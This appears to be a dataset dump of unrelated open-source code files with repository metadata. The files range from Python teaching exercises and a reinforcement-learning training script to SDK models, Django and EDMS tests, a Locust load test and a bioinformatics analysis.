print('╚'+'═'*max_length+'╝')
input()
output('Aufgabe 1','Die Ausgangsliste lautet ["mond","stoff","treib","raum","schiff"]. Wie lautet die Ausgabe von folgenden Anweisungen?')
output('Anweisung 1','print(liste[0])')
output('Lösung Anweisung 1:','Das erste Item der Liste wird ausgegeben: "mond"')
output('Anweisung 2','print(liste[2]+liste[1])')
output('Lösung Anweisung 2:','Das dritte und zweite Item der liste wird konkatiniert: "treibstoff"')
output('Anweisung 3','print(liste[-2]+liste[-1])')
output('Lösung Anweisung 3:','Das zweitletzte und letzte Item der Liste wird konkatiniert: "raumschiff"')
output('Anweisung 4','for wort in liste: if wort[0] == "s": print(wort)')
output('Lösung Anweisung 4:','Alle Items der Liste die mit einem "s" beginnen werden ausgegeben: "stoff", "schiff"')
output('Anweisung 5','for wort in liste: print(wort[1])')
output('Lösung Anweisung 5:','Von jedem Item der Liste wird der 2. Buchstabe ausgegeben: o,t,r,a,c')
output('Anweisung 6','liste=liste+["gestein"]')
output('Lösung Anweisung 6:','Fügt der Liste ein weiteres Item mit dem Inhalt "gestein" hinzu: ["mond","stoff","treib","raum","schiff", "gestein"]')
output('Anweisung 7','print(liste[0]+liste[-1])')
output('Lösung Anweisung 7:','Das erste und letzte Item der Liste wird konkatiniert: "mondgestein"')
output('Aufgabe 2','Welchen Wert haben die Listenobjekte s1,s2 und s3 jeweils nach folgenden Anweisungen:')
output('Anweisung 1','s1 = [1]: s1=[1,s1]: s1=[1,s1]')
output('Lösung Anweisung 1','s1=[1,[1,[1]]]')
output('Anweisung 2','A=["Haus","Garten"]: B=["bau","tier","pflanze"]: s2=[i+j for i in A for j in B]')
output('Lösung Anweisung 2','"Hausbau", "Haustier", "Hauspflanze", "Gartenbau", "Gartentier", "Gartenpflanze"')
output('Anweisung 3','A=[1,2,3,4]: B=[2,3,4,5]: s3=[i for i in A+B if (i not in A) or (i not in B)')
output('Lösung Anweisung 3','Es werden alle Zahlen ausgegeben welche nicht in beiden Listen vorkommen: 1,5')
|
[
"39341618+Apop85@users.noreply.github.com"
] |
39341618+Apop85@users.noreply.github.com
|
de11b77370f05d31f929a0e89ae8518b594ead80
|
8d47af9482444b07b52cf44cebcaf4b992df4d09
|
/agents/14_MinimumPRB/14.py
|
5f38c96b71c0088d5b0857b5e87d87b1363e01c9
|
[] |
no_license
|
w0lv3r1nix/retro-agents
|
f4dbce2db558c880b161062796e5397be65bdd10
|
c7f93a737dc6c6fc5d8343c099e14bd2bc97aaf1
|
refs/heads/master
| 2020-08-01T01:19:41.660018
| 2018-06-13T04:28:09
| 2018-06-13T04:28:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,842
|
py
|
#!/usr/bin/env python
"""
Train an agent on Sonic using an open source Rainbow DQN
implementation.
"""
import tensorflow as tf
from anyrl.algos import DQN
from anyrl.envs import BatchedGymEnv
from anyrl.envs.wrappers import BatchedFrameStack
from anyrl.models import rainbow_models
from anyrl.rollouts import BatchedPlayer, PrioritizedReplayBuffer, NStepPlayer
from anyrl.spaces import gym_space_vectorizer
import gym_remote.exceptions as gre
from sonic_util import AllowBacktracking, make_env
from MinimumPRB import MinimumPRB
def main():
"""Run DQN until the environment throws an exception."""
env = AllowBacktracking(make_env(stack=False, scale_rew=False))
env = BatchedFrameStack(BatchedGymEnv([[env]]), num_images=4, concat=False)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True # pylint: disable=E1101
with tf.Session(config=config) as sess:
dqn = DQN(*rainbow_models(sess,
env.action_space.n,
gym_space_vectorizer(env.observation_space),
min_val=-200,
max_val=200))
player = NStepPlayer(BatchedPlayer(env, dqn.online_net), 3)
optimize = dqn.optimize(learning_rate=1e-4)
sess.run(tf.global_variables_initializer())
dqn.train(num_steps=2000000, # Make sure an exception arrives before we stop.
player=player,
replay_buffer=MinimumPRB(500000, 0.5, 0.4, epsilon=0.1),
optimize_op=optimize,
train_interval=1,
target_interval=8192,
batch_size=32,
min_buffer_size=20000)
if __name__ == '__main__':
try:
main()
except gre.GymRemoteError as exc:
print('exception', exc)
|
[
"seungjaeryanlee@gmail.com"
] |
seungjaeryanlee@gmail.com
|
205a1f4bb79dfbfe132609918fb50ee0c8ed7da2
|
461cbe14775be116ea001ec36b8b9b4deb2f77bc
|
/lesson1.6_step7.py
|
42f6193f82db311382de80a482bc63b4c18cc740
|
[] |
no_license
|
Adoyan-Grigor/stepik-auto-tests-course
|
898a653062cfa4bdf484a363b956ed2004ef0629
|
406b1498362538ebec27118083c3de5a94898140
|
refs/heads/master
| 2023-05-10T18:25:09.085013
| 2021-06-02T13:16:35
| 2021-06-02T13:16:35
| 369,514,851
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 599
|
py
|
#!/usr/bin/python3
from selenium import webdriver
import time
try:
browser = webdriver.Chrome()
browser.get("http://suninjuly.github.io/huge_form.html")
elements = browser.find_elements_by_css_selector('[type="text"]')
for element in elements:
element.send_keys("Мой ответ")
button = browser.find_element_by_css_selector("button.btn")
button.click()
finally:
# успеваем скопировать код за 30 секунд
time.sleep(30)
# закрываем браузер после всех манипуляций
browser.quit()
|
[
"you@example.com"
] |
you@example.com
|
aba19dd9fae018990c2a4be8d819f2689788d268
|
a0fb29f99a852089193e4cc9a11e7263dc3f8b5f
|
/mayan/apps/documents/tests/test_document_version_models.py
|
b19f865060f817d3028cfe3263bdeaa1716f406d
|
[
"Apache-2.0"
] |
permissive
|
ikang9712/Mayan-EDMS
|
0e22a944d63657cea59c78023b604a01a622b52a
|
d6e57e27a89805329fe0c5582caa8e17882d94e6
|
refs/heads/master
| 2023-07-28T19:41:55.269513
| 2021-09-07T14:16:14
| 2021-09-07T14:16:14
| 402,884,683
| 1
| 0
|
NOASSERTION
| 2021-09-03T20:00:09
| 2021-09-03T20:00:09
| null |
UTF-8
|
Python
| false
| false
| 2,826
|
py
|
from ..literals import (
DOCUMENT_FILE_ACTION_PAGES_NEW, DOCUMENT_FILE_ACTION_PAGES_APPEND,
DOCUMENT_FILE_ACTION_PAGES_KEEP
)
from .base import GenericDocumentTestCase
class DocumentVersionTestCase(GenericDocumentTestCase):
def test_version_new_file_new_pages(self):
test_document_version_page_content_objects = self.test_document_version.page_content_objects
self.assertEqual(self.test_document.versions.count(), 1)
self._upload_test_document_file(action=DOCUMENT_FILE_ACTION_PAGES_NEW)
self.assertEqual(self.test_document.versions.count(), 2)
self.assertNotEqual(
self.test_document_version.page_content_objects,
test_document_version_page_content_objects
)
self.assertEqual(
self.test_document_version.page_content_objects,
list(self.test_document.file_latest.pages.all())
)
def test_version_new_version_keep_pages(self):
test_document_version_page_content_objects = self.test_document_version.page_content_objects
self.assertEqual(self.test_document.versions.count(), 1)
self._upload_test_document_file(action=DOCUMENT_FILE_ACTION_PAGES_KEEP)
self.assertEqual(self.test_document.versions.count(), 1)
self.assertEqual(
self.test_document_version.page_content_objects,
test_document_version_page_content_objects
)
self.assertNotEqual(
self.test_document_version.page_content_objects,
list(self.test_document.file_latest.pages.all())
)
def test_version_new_file_append_pages(self):
test_document_version_page_content_objects = self.test_document_version.page_content_objects
self.assertEqual(self.test_document.versions.count(), 1)
self.assertEqual(self.test_document.files.count(), 1)
self._upload_test_document_file(action=DOCUMENT_FILE_ACTION_PAGES_APPEND)
self.assertEqual(self.test_document.files.count(), 2)
self.assertEqual(self.test_document.versions.count(), 2)
test_document_version_expected_page_content_objects = list(
self.test_document.files.first().pages.all()
)
test_document_version_expected_page_content_objects.extend(
list(
self.test_document.files.last().pages.all()
)
)
self.assertNotEqual(
self.test_document_version.page_content_objects,
test_document_version_page_content_objects
)
self.assertEqual(
self.test_document_version.page_content_objects,
test_document_version_expected_page_content_objects
)
def test_method_get_absolute_url(self):
self.assertTrue(self.test_document.version_active.get_absolute_url())
|
[
"roberto.rosario@mayan-edms.com"
] |
roberto.rosario@mayan-edms.com
|
c4722abdfbd81b2b5a9a7eff8b02d361d255c7af
|
8a29f983b122602ef960d8c1f6fc6451569ed2d2
|
/te_discovery/conservation/extract_conservation_classes.py
|
166c8a4c459770ec2d21599a94d48d05cbd58982
|
[
"MIT"
] |
permissive
|
oaxiom/hesc_lincrna
|
a4832841b49f2b9b0da6bf8a169857550a0e8797
|
7a87d426bba93a027794b6bea36f1ae61d5d205b
|
refs/heads/master
| 2022-05-08T04:16:57.760960
| 2022-04-02T00:17:57
| 2022-04-02T00:17:57
| 187,936,591
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,718
|
py
|
import sys, os, itertools
from collections import Counter
import numpy as np
import matplotlib.pyplot as plot
import matplotlib.tri as tri
from glbase3 import *
import shared_conservation
# collect three things:
# 1. The total PhyloP score of the transcript
# 2. score for TE-containing bits
# 3. score for non-TE containign bits;
dfam = genelist('../dfam/dfam_annotation.tsv', format={'force_tsv': True, 'name': 0, 'type': 3, 'subtype': 4})
dfam_dict = {}
for te in dfam:
dfam_dict[te['name']] = '{0}:{1}:{2}'.format(te['type'], te['subtype'], te['name'])
transcripts = glload('../te_transcripts/transcript_table_merged.mapped.glb')
gl = glload('phyloP_conservation_table.glb')
print(gl)
t = 0.25
not_counted = 0
both_conserved = []
te_conserved = []
lncrna_conserved = []
for item in gl:
if item['phyloP_tes'] > t and item['phyloP_nottes'] > t:
both_conserved.append(item)
elif item['phyloP_tes'] > t:
te_conserved.append(item)
elif item['phyloP_nottes'] > t:
lncrna_conserved.append(item)
else:
not_counted += 1
print('Not counted : {0:,}'.format(not_counted))
print('Both conserved : {0:,}'.format(len(both_conserved)))
print('TE conserved : {0:,}'.format(len(te_conserved)))
print('lncRNA conserved: {0:,}'.format(len(lncrna_conserved)))
print('Total TE-containing transcripts: {0:,}'.format(len(transcripts)))
gl = genelist()
gl.load_list(both_conserved)
both_conserved = gl
gl = genelist()
gl.load_list(te_conserved)
te_conserved = gl
gl = genelist()
gl.load_list(lncrna_conserved)
lncrna_conserved = gl
all_data = {'both_conserved': both_conserved.map(genelist=transcripts, key='transcript_id'),
'te_conserved': te_conserved.map(genelist=transcripts, key='transcript_id'),
'lncrna_conserved': lncrna_conserved.map(genelist=transcripts, key='transcript_id')
}
for k in all_data:
# convert to a list of doms:
doms = []
for t in all_data[k]:
doms += [dfam_dict[d['dom']] for d in t['doms']]
c = Counter(doms)
c = c.most_common(20)#.items()
print(c)
vals = [i[1] for i in c]
labs = [i[0] for i in c]
vals.reverse()
labs.reverse()
fig = plot.figure(figsize=[2,2])
fig.subplots_adjust(left=0.5, top=0.97)
ax = fig.add_subplot(111)
ys = np.arange(len(vals))
ax.barh(ys, vals)
ax.set_xlabel('Number of TE domains')
ax.set_yticks(ys)
ax.set_yticklabels(labs)
[t.set_fontsize(6) for t in ax.get_yticklabels()]
[t.set_fontsize(6) for t in ax.get_xticklabels()]
#for y, p, x in zip(ys, percs, num_hits):
# ax.text(x+4, y, s='{0} ({1:.1f}%)'.format(x, p), va='center', fontsize=6)
fig.savefig('class_summary-{0}.pdf'.format(k))
|
[
"oaxiom@gmail.com"
] |
oaxiom@gmail.com
|
7ae56f768a8f140ecb1394772602106519a9ee18
|
eb38089224f1c2598f6ba17a28756bb040d4975a
|
/{{ cookiecutter.appname }}/program.py
|
04dd0d1ae5812276dd17999afe12ac501fb3280d
|
[] |
no_license
|
zooba/sqlazure-cookiecutter-demo
|
b21afe1775547ca3ecc014396f53fb12170c3df9
|
eee1aed495cafc32d29ff5e335f4cf3963d1f7ba
|
refs/heads/master
| 2021-06-08T10:02:56.428740
| 2016-11-04T22:40:58
| 2016-11-04T22:40:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 534
|
py
|
import pyodbc
CONNECTION_STRING = "{{cookiecutter.connection_string}}"
connection = pyodbc.connect(CONNECTION_STRING)
# Read all
cursor = connection.cursor()
cursor.execute(
"select LastName, Count(*) as 'Members' "
"from {{cookiecutter.namespace}}.{{cookiecutter.table}} "
"group by LastName "
"having Count(*) > 3 "
"order by 'Members' DESC")
row = cursor.fetchall()
print('Family Name | Members')
print('-------------------+--------')
print('\n'.join('{0[0]:<19}|{0[1]:>8}'.format(r) for r in row))
|
[
"steve.dower@microsoft.com"
] |
steve.dower@microsoft.com
|
d7c6e469c589e6a81c8cab720f7504fcc6b98f5c
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-bss/huaweicloudsdkbss/v2/model/list_quota_coupons_request.py
|
32bac674877d7d2748d85e8b59d9ef77c75969ef
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 3,159
|
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ListQuotaCouponsRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'body': 'QueryCouponQuotasReqExt'
}
attribute_map = {
'body': 'body'
}
def __init__(self, body=None):
"""ListQuotaCouponsRequest
The model defined in huaweicloud sdk
:param body: Body of the ListQuotaCouponsRequest
:type body: :class:`huaweicloudsdkbss.v2.QueryCouponQuotasReqExt`
"""
self._body = None
self.discriminator = None
if body is not None:
self.body = body
@property
def body(self):
"""Gets the body of this ListQuotaCouponsRequest.
:return: The body of this ListQuotaCouponsRequest.
:rtype: :class:`huaweicloudsdkbss.v2.QueryCouponQuotasReqExt`
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this ListQuotaCouponsRequest.
:param body: The body of this ListQuotaCouponsRequest.
:type body: :class:`huaweicloudsdkbss.v2.QueryCouponQuotasReqExt`
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListQuotaCouponsRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
41fa742a05fa6098767800003e945f5fca7db849
|
b7ba98a9038f977f1efcbda5da2a41ae08e602ae
|
/exercises/21_jinja2/task_21_1c.py
|
d015a0565f2d71e065ba18dfbd812d00edb77cff
|
[] |
no_license
|
Stanleygoo/pyneng-examples-exercises
|
f7914bc21aca119c7423af373a8b17b2917ea675
|
c27b608ac954149d841c0a53f1108a6100295544
|
refs/heads/master
| 2021-05-11T15:35:11.043546
| 2018-01-12T06:42:04
| 2018-01-12T06:42:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,721
|
py
|
# -*- coding: utf-8 -*-
'''
Задание 21.1c
Переделать функцию generate_cfg_from_template из задания 21.1, 21.1a или 21.1b:
* сделать автоматическое распознавание разных форматов для файла с данными
* для передачи разных типов данных, должен использоваться один и тот же параметр data
Должны поддерживаться такие форматы:
* YAML - файлы с расширением yml или yaml
* JSON - файлы с расширением json
* словарь Python
Если не получилось определить тип данных, вывести сообщение error_message (перенести текст сообщения в тело функции), завершить работу функции и вернуть None.
Проверить работу функции на шаблоне templates/for.txt и данных:
* data_files/for.yml
* data_files/for.json
* словаре data_dict
'''
error_message = '''
Не получилось определить формат данных.
Поддерживаются файлы с расширением .json, .yml, .yaml и словари Python
'''
data_dict = {'vlans': {
10: 'Marketing',
20: 'Voice',
30: 'Management'},
'ospf': [{'network': '10.0.1.0 0.0.0.255', 'area': 0},
{'network': '10.0.2.0 0.0.0.255', 'area': 2},
{'network': '10.1.1.0 0.0.0.255', 'area': 0}],
'id': 3,
'name': 'R3'}
|
[
"nataliya.samoylenko@gmail.com"
] |
nataliya.samoylenko@gmail.com
|
d0772dd0edd20d0af5d33d835497aa7e243a2f9f
|
afc4333ad944301ad969de445a5a4e3b223bb456
|
/greedy/greedy_03.py
|
c5f1ec91097b5ff762d82881078e50a0b2bf23bf
|
[] |
no_license
|
ykiseong303/python_algorithm
|
4cf2df8c0ff2223eab70d246c87466d1ebc26133
|
e90268103983917835ba6dbcd14b4b515c3d0fae
|
refs/heads/main
| 2023-07-18T10:41:40.180855
| 2021-08-27T14:33:14
| 2021-08-27T14:33:14
| 342,607,860
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 538
|
py
|
'''
분류 : 그리디 알고리즘
문제 : 1로 만들기 (이코테 문제)
작성일자 : 2021.02.26
'''
# 정수 N이 입력될 때
# K로 나누거나 1로 빼기
# 1까지 되는 연산을 사용하는 횟수의 최솟값을 출력
## 목적 : N을 1로 만드는데 가장 적은 횟수로 수행하기
## 접근 : 현재의 N 값에서 가장 작게 만들 수 있는 연산을 수행
N, K = map(int, input().split())
count = 0
while N>1 :
if not N%K :
N//=K
else :
N-=1
count += 1
print(count)
|
[
"noreply@github.com"
] |
ykiseong303.noreply@github.com
|
9d44c7fc30c7532a83cbfd55e8f20cb446146010
|
2f63688febd21dc3ae6b19abfa79ad313c820154
|
/0343_Integer_Break/try_3.py
|
528ae78d9d8cc6ac2b91f6f7d4fed33f238a4064
|
[] |
no_license
|
novayo/LeetCode
|
cadd03587ee4ed6e35f60294070165afc1539ac8
|
54d0b3c237e0ffed8782915d6b75b7c6a0fe0de7
|
refs/heads/master
| 2023-08-14T00:35:15.528520
| 2023-07-30T05:56:05
| 2023-07-30T05:56:05
| 200,248,146
| 8
| 1
| null | 2022-11-19T04:37:54
| 2019-08-02T14:24:19
|
Python
|
UTF-8
|
Python
| false
| false
| 412
|
py
|
class Solution:
def integerBreak(self, n: int) -> int:
dp = [1] * (n+1)
for _n in range(2, n+1):
i, j = 1, _n-1
max_value = 0
while i <= j:
max_value = max(max_value, max(i, dp[i]) * max(j, dp[j]))
i, j = i+1, j-1
dp[_n] = max_value
return dp[-1]
|
[
"f14051172@gs.ncku.edu.tw"
] |
f14051172@gs.ncku.edu.tw
|
1558ce39aec8e8a80e658eadae3fa17706dbffbc
|
4315cfa1bd13f08053d549c7c00287a76d656f9e
|
/src/abc159/B.py
|
612261c7290dcb8c80f4dd9c313c478367e21286
|
[] |
no_license
|
ma96o/atcoder_archive
|
1c47e2189b2d55e7f519349e02ceb24500e2164e
|
8bc21d351535eda1f81a47442156f92f234cf6c3
|
refs/heads/main
| 2023-08-13T17:03:13.855154
| 2021-09-15T14:55:00
| 2021-09-15T14:55:00
| 350,179,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
s = input()
n = len(s)
hs = s[:(n-1)//2]
vs = s[((n+3)//2-1):]
if s == s[::-1] and hs == hs[::-1] and vs == vs[::-1]:
print("Yes")
exit()
print("No")
|
[
"masaaki1915@gmail.com"
] |
masaaki1915@gmail.com
|
325c7ead66c60a3d6d4100600e21b951274e002e
|
2efee5574ff160c97a94e243c1c820814b008058
|
/parse/atest.py
|
d1fb32e644208592b435d8764e45b986a204877e
|
[] |
no_license
|
haobtc/blockinfo
|
5c18430f3f5eaa7b979c119945b686e0e09d2e1c
|
00a094d917224dbe6acb6565125badec14f2400f
|
refs/heads/master
| 2020-03-29T07:01:35.936157
| 2014-05-14T03:55:27
| 2014-05-14T03:55:27
| 17,733,081
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
from bitcointools.deserialize import decode_script
script = 'j(n\xd6{q\xado\xbcp3\xa74\x06>I\x84\x8dv\x9b\x89m\x83h\xfe\x05\x9e;7\xf0q\n\x1a\x89\x00\x00\x00\x00\x01\x00\x00\x00'
script = 'j(\xd8`\x1d4\xd0\x07lLR/\xab\xe9\xa4>\x83\x87\xcb,\xaa\r\xec\xfcJ\xd0/\xc1\xda\x83o\xb8\xfe\xa4\x00\x00\x00\x00\x03\x00\x00\x00'
script = '$\x12\xae\xab\xaf\x92O[\xc9{$0\xe8/2\xe3\r\x1e&\xda\xccVw\x072Y\n[\xf4V\xbe\xb1f\x05\x00\x00\x00'
script = '$\xc6\xfe\xfa\x02\x8eY5\x10+\xb6\xc0\xf0}bG\xc2\x12\x8a\x19*L\x0eW\xd8\x94\x0e\xfa!e\xde>\xb4P\x00\x00\x00'
print len(script), decode_script(script)
|
[
"superisaac.ke@gmail.com"
] |
superisaac.ke@gmail.com
|
102137592b05149728da3095ba674e187218c5b7
|
7a9472018f8a5c06da7341746bdb54a91ec02df0
|
/client/locustfile.py
|
09f77e398421728f25ea0b2e23edca5f75a846d6
|
[] |
no_license
|
nmaekawa/websockets-tst
|
fb55fcca04d953b086ae8c36e4c2df5c55566c0e
|
7278e134b1c60a87873a38f7bbff7f8e3b96fa1c
|
refs/heads/master
| 2022-07-27T00:31:53.448846
| 2020-01-28T21:33:22
| 2020-01-28T21:33:22
| 221,528,746
| 0
| 0
| null | 2022-05-25T03:33:53
| 2019-11-13T18:47:05
|
Python
|
UTF-8
|
Python
| false
| false
| 5,553
|
py
|
#
# automated run: use --no-web and --csv
# $> locust -f examples/basic.py --csv=example --no-web -t10m -c 1 -r 1 --host <hxat url>
#
import os
import json
import logging
from random import randint
from subprocess import Popen
from subprocess import PIPE
from uuid import uuid4
from locust import between
from locust import HttpLocust
from locust import TaskSet
from locust import task
import locust.stats
# set custom interval for stats; default is 2s
locust.stats.CSV_STATS_INTERVAL_SEC = 5
TOKEN = ''
USER_ID = ''
USER_NAME = ''
CONTEXT_ID = ''
COLLECTION_ID = ''
TARGET_SOURCE_ID = ''
RESOURCE_LINK_ID = ''
UTM_SOURCE = ''
# this is particular to the target_source document
# and used to randomize the region being annotate
PTAG=2
target_doc = [0, 589, 313, 434, 593, 493]
def fetch_fortune():
process = Popen('fortune', shell=True, stdout=PIPE, stderr=None)
output, _ = process.communicate()
return output.decode('utf-8')
def fresh_wa():
sel_start = randint(0, target_doc[PTAG])
sel_end = randint(sel_start, target_doc[PTAG])
x = {
"@context": "http://catchpy.harvardx.harvard.edu.s3.amazonaws.com/jsonld/catch_context_jsonld.json",
"body": {
"type": "List",
"items": [{
"format": "text/html",
"language": "en",
"purpose": "commenting",
"type": "TextualBody",
"value": fetch_fortune()
}],
},
"creator": {
"id": "d99019cf42efda58f412e711d97beebe",
"name": "nmaekawa2017"
},
"id": "013ec74f-1234-5678-3c61-b5cf9d6f7484",
"permissions": {
"can_admin": [ USER_ID ],
"can_delete": [ USER_ID ],
"can_read": [],
"can_update": [ USER_ID ]
},
"platform": {
"collection_id": COLLECTION_ID,
"context_id": CONTEXT_ID,
"platform_name": "edX",
"target_source_id": TARGET_SOURCE_ID,
},
"schema_version": "1.1.0",
"target": {
"items": [{
"selector": {
"items": [
{ "endSelector": { "type": "XPathSelector", "value": "/div[1]/p[{}]".format(PTAG) },
"refinedBy": { "end": sel_end, "start": sel_start, "type": "TextPositionSelector" },
"startSelector": { "type": "XPathSelector", "value": "/div[1]/p[{}]".format(PTAG) },
"type": "RangeSelector" },
],
"type": "Choice"
},
"source": "http://sample.com/fake_content/preview", "type": "Text"
}],
"type": "List"
},
"type": "Annotation"
}
return x
class UserBehavior_CreateWebAnnotation(TaskSet):
#def on_start(self):
# self.catcha = fresh_wa()
@task(1)
def add_annotation(self):
catcha = fresh_wa()
# create annotation
anno_id = str(uuid4())
target_path = '/annotation_store/api/{}?resource_link_id={}&utm_source={}&version=catchpy'.format(
anno_id, RESOURCE_LINK_ID, UTM_SOURCE)
response = self.client.post(
target_path, json=catcha, catch_response=True,
headers={
'Content-Type': 'Application/json',
'x-annotator-auth-token': TOKEN,
'Referer': 'https://naomi.hxat.hxtech.org/lti_init/launch_lti/',
},
verify=False,
)
if response.content == '':
response.failure('no data')
else:
try:
a_id = response.json()['id']
except KeyError:
resp = response.json()
if 'payload' in resp:
response.failure(resp['payload'])
else:
response.failure('no id in response')
return
except json.decoder.JSONDecodeError as e:
response.failure(e)
return
else:
response.success()
@task(10)
def search(self):
target_path = '/annotation_store/api/?resource_link_id={}&utm_source={}&version=catchpy&limit=10&offset=0&media=text&source_id={}&context_id={}&collection_id={}'.format(
RESOURCE_LINK_ID, UTM_SOURCE,
TARGET_SOURCE_ID, CONTEXT_ID, COLLECTION_ID)
response = self.client.get(
target_path, catch_response=True,
headers={
'Content-Type': 'Application/json',
'x-annotator-auth-token': TOKEN,
'Referer': 'https://naomi.hxat.hxtech.org/lti_init/launch_lti/',
},
verify=False,
)
if response.content == '':
response.failure('no data')
else:
try:
rows = response.json()['rows']
except KeyError:
resp = response.json()
if 'payload' in resp:
response.failure(resp['payload'])
else:
response.failure('missing rows in search response')
return
except json.decoder.JSONDecodeError as e:
response.failure(e)
return
else:
response.success()
class WebsiteUser(HttpLocust):
task_set = UserBehavior_CreateWebAnnotation
wait_time = between(5, 20)
|
[
"nmaekawa@g.harvard.edu"
] |
nmaekawa@g.harvard.edu
|
a07aa91eec7899727971e8ef6382c7d6c75ff0dc
|
bf75d497793b9f5df14bacc368cb43a509615045
|
/accounts/migrations/0001_initial.py
|
0f45c720c0474885cb3946df0d1bf4ea76c3b478
|
[] |
no_license
|
haruyasu/django-allauth-base
|
05202fff81f74e44ec8d41cafd141c66d97cc034
|
b7f65e4844331e3341ec9f562b9f71b79f333941
|
refs/heads/main
| 2023-07-18T21:53:47.670149
| 2021-09-22T06:24:06
| 2021-09-22T06:24:06
| 409,087,878
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,397
|
py
|
# Generated by Django 3.2.7 on 2021-09-22 05:24
import accounts.models
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='CustomUser',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=254, unique=True, verbose_name='メールアドレス')),
('name', models.CharField(max_length=30, verbose_name='氏名')),
('company', models.CharField(blank=True, max_length=30, null=True, verbose_name='会社名')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='入会日')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
managers=[
('objects', accounts.models.UserManager()),
],
),
]
|
[
"harukun2002@gmail.com"
] |
harukun2002@gmail.com
|
69af161c933e2333c069fc3bf5828085f06d2373
|
ceb3d82494813cd21e38231964e098bb3efe093b
|
/Feature/structure_tensor_eigenvalues.py
|
f72a99520193f77a04dcbe1808375927c8ee383b
|
[
"Apache-2.0"
] |
permissive
|
Joevaen/Scikit-image_On_CT
|
0c0a306a9ca18668bd9bb4105e577766b1d5578b
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
refs/heads/main
| 2023-03-16T01:28:04.871513
| 2021-03-16T07:53:57
| 2021-03-16T07:53:57
| 344,071,656
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 311
|
py
|
# 计算结构张量的特征值。
from skimage.feature import structure_tensor
from skimage.feature import structure_tensor_eigenvalues
import numpy as np
square = np.zeros((5, 5))
square[2, 2] = 1
A_elems = structure_tensor(square, sigma=0.1, order='rc')
print(structure_tensor_eigenvalues(A_elems)[0])
|
[
"joevaen@126.com"
] |
joevaen@126.com
|
c1b3bd9f77d36739a30305d571e50d3ca6a74293
|
ae46ca697eabe8ec5eea14aa0e218f6b9f7d0457
|
/util/puzzle_runner.py
|
ab24a1ae85838269695b3f3f11c93e591fe295be
|
[] |
no_license
|
MyreMylar/word_search
|
334993d0bd4eafa8a641ba09abf82d4f4cbbed48
|
4d33ad230240cbf259b374725122786118cf5b2c
|
refs/heads/master
| 2020-03-12T23:56:28.520090
| 2018-04-24T15:37:15
| 2018-04-24T15:37:15
| 130,876,847
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,075
|
py
|
import hashlib
import pygame
from pygame.locals import *
class Puzzle:
def __init__(self, task, answer):
self.task = task
self.answer = answer
self.answer_hash = ""
self.correct = False
class RenderedPuzzle:
def __init__(self, task, task_size, answer, answer_size, result, result_size):
self.task = task
self.task_size = task_size
self.answer = answer
